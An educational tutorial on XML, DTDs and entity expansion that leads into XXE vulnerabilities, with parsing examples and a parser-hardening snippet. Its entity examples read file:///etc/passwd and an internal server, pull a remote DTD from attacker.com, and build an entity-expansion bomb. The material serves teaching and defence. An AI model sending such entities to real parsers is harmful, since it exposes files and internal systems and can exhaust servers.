XML & DTD Basics

Understanding XML structure, Document Type Definitions (DTDs), and entity processing - the foundation for comprehending XXE vulnerabilities.

Overview

XML (eXtensible Markup Language) is a markup language that defines rules for encoding documents in a format that is both human-readable and machine-readable. To understand XXE vulnerabilities, you must first understand how XML parsers process entities and DTDs.

This guide covers the fundamental concepts of XML, DTDs, and entity processing that form the basis for understanding XXE attacks.

XML Document Structure

A basic XML document consists of elements with opening and closing tags, attributes, and content. Here's a simple example:

Simple XML Example

XML
<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <book id="1">
    <title>Security Engineering</title>
    <author>Ross Anderson</author>
    <price>59.99</price>
  </book>
  <book id="2">
    <title>The Web Application Hacker's Handbook</title>
    <author>Dafydd Stuttard</author>
    <price>49.99</price>
  </book>
</catalog>
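
To make the element, attribute, and content terminology concrete, here is a minimal sketch that reads the catalog above with Python's standard-library `xml.etree.ElementTree`. The names `CATALOG_XML` and `list_books` are hypothetical and chosen only for this illustration.

```python
import xml.etree.ElementTree as ET

# The catalog document from the example above, as bytes.
CATALOG_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<catalog>
  <book id="1">
    <title>Security Engineering</title>
    <author>Ross Anderson</author>
    <price>59.99</price>
  </book>
  <book id="2">
    <title>The Web Application Hacker's Handbook</title>
    <author>Dafydd Stuttard</author>
    <price>49.99</price>
  </book>
</catalog>"""


def list_books(xml_bytes):
    """Return one dict per <book> element (hypothetical helper)."""
    root = ET.fromstring(xml_bytes)  # root is the <catalog> element
    books = []
    for book in root.findall("book"):
        books.append({
            "id": book.get("id"),                # attribute value
            "title": book.findtext("title"),     # text of a child element
            "author": book.findtext("author"),
            "price": float(book.findtext("price")),
        })
    return books


books = list_books(CATALOG_XML)
for entry in books:
    print(entry["id"], entry["title"], entry["price"])
```

Attributes such as `id` are read with `get`, while element content is read with `findtext`.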

Document Type Definition (DTD)

A DTD defines the structure and legal elements of an XML document. DTDs can be declared inline (internal) or referenced from external files (external). DTDs are where XML entities are declared.

There are two types of DTDs:

  • Internal DTD: Declared within the XML document itself
  • External DTD: Referenced from an external file or URL

Internal DTD Example

XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
<note>
  <to>Security Team</to>
  <from>Developer</from>
  <heading>Reminder</heading>
  <body>Disable external entities in production!</body>
</note>
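
The declaration `<!ELEMENT note (to,from,heading,body)>` says that a note must contain exactly those four children in that order. Python's standard-library parsers are non-validating, so they read the DTD but do not enforce it. The sketch below therefore checks that one sequence rule by hand. `EXPECTED_CHILDREN` and `matches_note_model` are hypothetical names, and this is not a general DTD validator.

```python
import xml.etree.ElementTree as ET

NOTE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
<note>
  <to>Security Team</to>
  <from>Developer</from>
  <heading>Reminder</heading>
  <body>Disable external entities in production!</body>
</note>"""

# Hand-written mirror of the content model (to,from,heading,body).
EXPECTED_CHILDREN = ["to", "from", "heading", "body"]


def matches_note_model(xml_bytes):
    """Check the child order of <note> against the sequence above."""
    root = ET.fromstring(xml_bytes)
    child_tags = [child.tag for child in root]
    return root.tag == "note" and child_tags == EXPECTED_CHILDREN


print(matches_note_model(NOTE_XML))
```

A document whose children appear in a different order still parses without error, but it fails this check, which is the difference between a well-formed document and a valid one.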

XML Entities

XML entities are named placeholders that the parser replaces with other content. The main kinds are:

  1. Predefined Entities and Character References: Represent special characters (e.g., &lt; or &#60; for <)
  2. General Entities: Custom entities defined in the DTD and referenced in document content
  3. Parameter Entities: Used only within DTD definitions (declared and referenced with %)
  4. External Entities: General or parameter entities whose content comes from an external source (the source of XXE vulnerabilities)

General entities are declared in the DTD and then referenced in the XML document using the &entityname; syntax.

General Entity Example

XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ENTITY company "ACME Corporation">
  <!ENTITY email "security@acme.com">
]>
<message>
  <from>&company;</from>
  <contact>&email;</contact>
  <text>This is a message from our company.</text>
</message>
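
As a quick check of how these references resolve, the following sketch parses the message document with Python's `xml.etree.ElementTree`, which expands internal general entities declared in the internal DTD. The variable names are hypothetical.

```python
import xml.etree.ElementTree as ET

MESSAGE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ENTITY company "ACME Corporation">
  <!ENTITY email "security@acme.com">
]>
<message>
  <from>&company;</from>
  <contact>&email;</contact>
  <text>This is a message from our company.</text>
</message>"""

root = ET.fromstring(MESSAGE_XML)

# By the time the tree is built, the references have been replaced
# with the values declared in the DTD.
sender = root.findtext("from")
contact = root.findtext("contact")
print(sender)
print(contact)
```

The application code never sees `&company;` or `&email;`; it only sees the substituted text.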

External Entities

External entities reference content from outside the XML document. This is where XXE vulnerabilities originate. When an XML parser that is configured to resolve external entities processes one, it retrieves the content from the specified location.

External entities use the SYSTEM keyword to specify the location:

External Entity Syntax

XML
<!ENTITY entityname SYSTEM "URI">

<!-- Examples -->
<!ENTITY external SYSTEM "http://example.com/data.xml">
<!ENTITY localfile SYSTEM "file:///etc/passwd">
<!ENTITY network SYSTEM "http://internal-server/secret">
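
Whether such a declaration is ever resolved depends on the parser. As one data point, the sketch below feeds a document with an external entity to Python's `xml.etree.ElementTree`, which does not resolve external entities and raises `ParseError` when it meets the reference. Other parsers and other configurations may behave differently and load the file. `XXE_XML` and `try_parse` are hypothetical names.

```python
import xml.etree.ElementTree as ET

XXE_XML = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY localfile SYSTEM "file:///etc/passwd">
]>
<data>&localfile;</data>"""


def try_parse(xml_bytes):
    """Report whether ElementTree accepted or rejected the document."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        # ElementTree treats the unresolved external entity as an error.
        return f"rejected: {exc}"
    return f"parsed: {root.text!r}"


result = try_parse(XXE_XML)
print(result)
```

No file is read in this run; the parser stops at the reference instead of fetching the URI.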

Parameter Entities

Parameter entities are special entities used within DTD declarations. They are defined and referenced with a percent sign (%). Parameter entities are particularly important in blind XXE attacks.

Syntax: <!ENTITY % name "value">

Parameter entities can only be used within the DTD, not in the XML document content.

Parameter Entity Example

XML
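<!ENTITY % system "Windows 10">
<!ENTITY % version "21H2">
<!-- Parameter entity references inside another declaration's value are only allowed in an external DTD, not in the internal subset -->
<!ENTITY full "%system; %version;">

<!-- Parameter entities can also reference external DTDs -->
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;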

Entity Expansion Process

When an XML parser encounters an entity reference, it expands (replaces) the reference with the entity's value. This process is called entity expansion.

For internal entities: The parser substitutes the predefined value

For external entities: The parser:

  1. Retrieves content from the specified URI
  2. Parses the retrieved content
  3. Substitutes the entity reference with the content

This automatic retrieval and parsing of external content is what makes XXE attacks possible.

Entity Expansion Example

XML
<!-- Entity Declaration -->
<!ENTITY company "ACME Corp">

<!-- Entity Reference in XML -->
<name>&company;</name>

<!-- After Entity Expansion -->
<name>ACME Corp</name>

<!-- External Entity Example -->
<!ENTITY external SYSTEM "file:///etc/passwd">
<data>&external;</data>

<!-- Parser retrieves file content and expands -->
<data>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
</data>
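
The substitution step for internal entities can be modelled in a few lines. This is a toy model of expansion, not how a real parser is implemented: it takes the entity table as a plain dictionary, handles internal entities only, and leaves unknown references untouched. `ENTITY_REF` and `expand_entities` are hypothetical names.

```python
import re

# Matches a general entity reference such as &company;
ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")


def expand_entities(text, entities, max_depth=10):
    """Repeatedly replace &name; with its declared value.

    Stops when a pass replaces nothing, and gives up after max_depth
    passes so that a self-referencing entity cannot loop forever.
    """
    for _ in range(max_depth):
        replaced = False

        def substitute(match):
            nonlocal replaced
            name = match.group(1)
            if name in entities:
                replaced = True
                return entities[name]
            return match.group(0)  # unknown reference: leave as-is

        text = ENTITY_REF.sub(substitute, text)
        if not replaced:
            return text
    raise ValueError("entity nesting too deep or recursive")


expanded = expand_entities("<name>&company;</name>", {"company": "ACME Corp"})
print(expanded)
```

An external entity adds one step before the substitution: the value is fetched from the declared URI instead of being looked up in the table.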

Security Implications

The ability for XML parsers to automatically retrieve and process external entities creates several security risks:

  1. File Disclosure: Attackers can read arbitrary files from the server's filesystem
  2. SSRF (Server-Side Request Forgery): Attackers can make the server send requests to internal systems
  3. Denial of Service: Malicious entity definitions can cause excessive resource consumption
  4. Remote Code Execution: In some configurations, attackers can execute arbitrary code
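
The denial-of-service risk is easiest to see with arithmetic. If each entity is defined as several references to the previous one, the expanded size grows exponentially while the declarations stay tiny. The sketch below only builds the declarations and computes the size; it never parses them. The entity names `e0`, `e1`, ... and both function names are hypothetical.

```python
def build_nested_entities(levels, fanout, base="lol"):
    """Build DTD declarations where each entity repeats the previous one."""
    lines = [f'<!ENTITY e0 "{base}">']
    for level in range(1, levels + 1):
        refs = f"&e{level - 1};" * fanout
        lines.append(f'<!ENTITY e{level} "{refs}">')
    return "\n".join(lines)


def expanded_length(levels, fanout, base_length):
    """Characters produced by fully expanding the top-level entity."""
    return base_length * fanout ** levels


declarations = build_nested_entities(levels=9, fanout=10)
print(len(declarations), "characters of declarations")
print(expanded_length(levels=9, fanout=10, base_length=3), "characters after expansion")
```

A parser without expansion limits would try to materialise the full expanded text in memory.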

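Historically, many XML parsers shipped with external entity processing enabled by default, and some still do. An application is therefore vulnerable unless its parser's defaults are known to be safe or developers explicitly disable the feature.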
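
As an illustration of disabling the feature explicitly, the sketch below configures Python's standard-library SAX parser using the feature flags from `xml.sax.handler`. Recent Python versions already leave general external entities off by default, so the explicit calls mainly document intent. `TextCollector` and `parse_text_safely` are hypothetical names, and other languages and libraries use different switches.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text_safely(xml_bytes):
    """Parse with external general and parameter entities switched off."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


document = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY external SYSTEM "file:///etc/passwd">
]>
<data>&external;</data>"""

text = parse_text_safely(document)
print(repr(text))
```

With these settings the external reference is skipped rather than resolved, while internal entities continue to expand as usual.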

Key Takeaways

Understanding these fundamentals is essential for comprehending XXE vulnerabilities:

  • XML documents can include DTD declarations that define entities
  • External entities reference content from external URIs (files, URLs)
  • XML parsers that resolve external entities retrieve and expand them automatically
  • This behavior is enabled by default in some parsers, so it must be checked and disabled explicitly
  • Parameter entities are used in DTDs and are key to blind XXE attacks
  • Entity expansion can access local files, network resources, and more

The next step is understanding how attackers exploit these features to perform XXE attacks.